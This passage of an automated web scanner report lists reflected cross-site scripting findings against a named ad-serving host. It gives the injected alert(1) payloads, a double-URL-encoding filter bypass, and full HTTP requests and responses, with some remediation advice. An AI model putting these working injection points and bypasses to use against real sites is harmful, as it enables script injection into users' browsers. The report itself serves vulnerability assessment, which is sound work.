Set-Cookie: i_1=33:353:516:3:0:34115:1296351600:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 869

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!25bb1'-alert(1)-'42f2cbb6b9e&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 325c1'-alert(1)-'2ac3f968620 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147325c1'-alert(1)-'2ac3f968620&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:49 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34115:1296351649:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 869

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147325c1'-alert(1)-'2ac3f968620&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.100. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36420'-alert(1)-'70de7b5bcbb was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a36420'-alert(1)-'70de7b5bcbb HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:20 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34115:1296351680:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:41:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 880

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a36420'-alert(1)-'70de7b5bcbb';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.101. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ef8'-alert(1)-'03feb110922 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ86ef8'-alert(1)-'03feb110922&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:02 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34115:1296351662:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:41:02 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 880

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ86ef8'-alert(1)-'03feb110922&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.102. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb2d8%2522%253balert%25281%2529%252f%252f41a552df8a3 was submitted in the REST URL parameter 2. This input was echoed as fb2d8";alert(1)//41a552df8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357fb2d8%2522%253balert%25281%2529%252f%252f41a552df8a3/353.0.js.120x30/1296350847** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357fb2d8";alert(1)//41a552df8a3/353.0.js.120x30/1296353113**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.103. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f66b8%2522%253balert%25281%2529%252f%252f63760bb090e was submitted in the REST URL parameter 3. This input was echoed as f66b8";alert(1)//63760bb090e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30f66b8%2522%253balert%25281%2529%252f%252f63760bb090e/1296350847** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30f66b8";alert(1)//63760bb090e/1296353114**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.104. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2d70'-alert(1)-'deaf3db773 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488b2d70'-alert(1)-'deaf3db773&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:36 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34115:1296351635:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 870

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488b2d70'-alert(1)-'deaf3db773&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {

...[SNIP]...

5.105. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e381c'-alert(1)-'e8f4f7459d2 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Ge381c'-alert(1)-'e8f4f7459d2&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:22 GMT; path=/
Set-Cookie: i_1=33:353:812:3:0:34115:1296351622:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:22 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 875

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Ge381c'-alert(1)-'e8f4f7459d2&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

5.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2902'-alert(1)-'1b81fa1f4a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&c2902'-alert(1)-'1b81fa1f4a5=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:42:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:42:43 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34115:1296351763:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:42:43 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 872

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&c2902'-alert(1)-'1b81fa1f4a5=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.107. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60a0'-alert(1)-'db9c19dffc0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639b60a0'-alert(1)-'db9c19dffc0&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:09 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34115:1296351609:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:09 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 881

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639b60a0'-alert(1)-'db9c19dffc0&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       f
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db6f1'-alert(1)-'76b72a8b0c6 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!db6f1'-alert(1)-'76b72a8b0c6&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:00 GMT; path=/
Set-Cookie: i_1=33:353:812:3:0:34115:1296351600:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 876

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!db6f1'-alert(1)-'76b72a8b0c6&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.109. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a3b0'-alert(1)-'e3b21ac569d was submitted in the AN parameter. This input was echoed unmodified in the application's response.

